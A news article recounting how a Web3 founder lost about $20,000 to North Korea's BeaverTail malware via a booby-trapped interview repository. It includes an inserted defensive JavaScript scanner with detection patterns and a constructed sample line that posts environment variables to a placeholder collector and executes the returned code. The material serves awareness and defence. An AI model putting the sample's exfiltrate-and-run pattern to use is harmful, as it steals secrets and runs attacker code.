How a Web3 Founder Fell Victim to The Notorious North Korean “BeaverTail” Malware
Web3 founder Akshit Ostwal lost $20K to North Korea’s BeaverTail malware in a sophisticated crypto scam targeting developers.
The Web3 space faced a harsh reminder this week. Akshit Ostwal, the co-founder of Epoch Protocol, lost over $20,000 after helping a friend with what appeared to be a standard technical interview.
This incident highlights the ongoing campaign by North Korean hackers to target the very people building the future of the internet.
How the High Stakes Crypto Scam Started
The trouble started last year on December 18, with a simple request from a friend. This friend was applying for a new job and asked Ostwal to review a code repository.
The friend believed the code came from a legitimate recruiter at a prominent firm.
Ostwal wanted to be helpful and ran the third-party code on his local machine.
This act of kindness opened the door for the “Contagious Interview” campaign, which was linked to the notorious state-sponsored Lazarus Group from North Korea.
Instead of mass phishing, these attackers now use high-touch social engineering to trick developers into running tampered files.
Anatomy of the BeaverTail Malware Attack
Ostwal noted in an X post that once he executed the code, a silent infection chain started on his machine.
Security experts at Seal911 identified the main culprit as the BeaverTail malware. This JavaScript-based piece of software is often used with a secondary backdoor called InvisibleFerret.
When used together, they become an almost unstoppable crypto-stealing duo for any developer environment.
According to Ostwal, the malware worked in several stages:
The first was automatic execution: as soon as the local server started, a file named analytics.controller.js ran a hidden function.
Next, the script immediately sent Ostwal’s system environment variables to the attacker. This included sensitive items like database URLs and private keys.
Finally, the attacker’s server sent back malicious JavaScript, which executed with root permissions on the infected device.
Before long, $20,000 had gone down the drain.
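A pre-run check for the chain described above, as an added example that is not code from the article, Ostwal, or Seal911: it flags any file that reads the whole of process.env, makes a network call, and executes dynamically built code. The rule patterns, function names, and the sample snippet are constructed assumptions for illustration, not BeaverTail signatures.

```javascript
// Added example: heuristic triage of untrusted JavaScript before running it.
const fs = require('fs');
const path = require('path');

// Heuristics chosen for this example (assumptions, not BeaverTail signatures).
const RULES = {
  // process.env used as a whole object, not a single key like process.env.PORT
  envDump: /process\.env\b(?!\s*(?:[.\[;]|$))/,
  network: /\b(?:fetch|axios(?:\.\w+)?|https?\.(?:get|request))\s*\(/,
  dynamicExec: /\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.run\w*\s*\(/,
};

// Returns { verdict, hits } where hits maps rule name -> 1-based line numbers.
function scanSource(text) {
  const hits = {};
  text.split('\n').forEach((line, i) => {
    for (const [name, re] of Object.entries(RULES)) {
      if (re.test(line)) (hits[name] = hits[name] || []).push(i + 1);
    }
  });
  // All three together in one file is the full chain; any single risky primitive needs a human look.
  const full = hits.envDump && hits.network && hits.dynamicExec;
  const verdict = full ? 'block' : (hits.envDump || hits.dynamicExec) ? 'review' : 'clean';
  return { verdict, hits };
}

// Walks a checkout; meant to run before installing dependencies or starting the server.
function scanRepo(root) {
  const report = [];
  for (const e of fs.readdirSync(root, { withFileTypes: true })) {
    const p = path.join(root, e.name);
    if (e.isDirectory()) {
      if (e.name !== '.git' && e.name !== 'node_modules') report.push(...scanRepo(p));
    } else if (/\.[cm]?js$/.test(e.name)) {
      const r = scanSource(fs.readFileSync(p, 'utf8'));
      if (r.verdict !== 'clean') report.push({ file: p, ...r });
    }
  }
  return report;
}

// Constructed sample mimicking the described controller; COLLECTOR_URL is a placeholder.
const SAMPLE_CONTROLLER = [
  "exports.track = async () => {",
  "  const r = await axios.post(COLLECTOR_URL, { env: process.env });",
  "  new Function(r.data)();",
  "};",
].join('\n');

console.log(scanSource(SAMPLE_CONTROLLER));
```

A clean result from a pattern scan like this does not make a repository safe to run; obfuscated code will evade it, so unreviewed interview code still belongs in a disposable VM or container with no wallet keys or production secrets in its environment.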
Why the Crypto Scam Remained Hidden
Notably, the hackers did not move the money right away. Instead, they likely maintained a backdoor on Ostwal’s device for nearly a month. During this time, they wrote custom scripts to unstake his DeFi portfolio.
They also waited for the perfect moment to “sweep” all his assets in a single transaction.
The attackers eventually targeted both EVM-compatible wallets and Solana accounts.
They used tools like Near-Intents and the Rubic Exchange to move the stolen funds. This “chain-hopping” tactic makes it difficult for investigators to track the money across different blockchains.
The Record-Breaking Scale of North Korean Theft
Ostwal’s experience is part of a massive surge in cybercrime. Data from the 2026 Crypto Crime Report indicates that North Korean hackers stole $2.02 billion last year alone.
This figure accounts for the majority of the $3.4 billion lost to crypto theft globally last year.
The “Contagious Interview” campaign has proven remarkably effective. Hackers create hundreds of malicious NPM packages and use AI to generate human-sounding interview responses.
In other words, they have essentially turned the job market into a minefield for software engineers.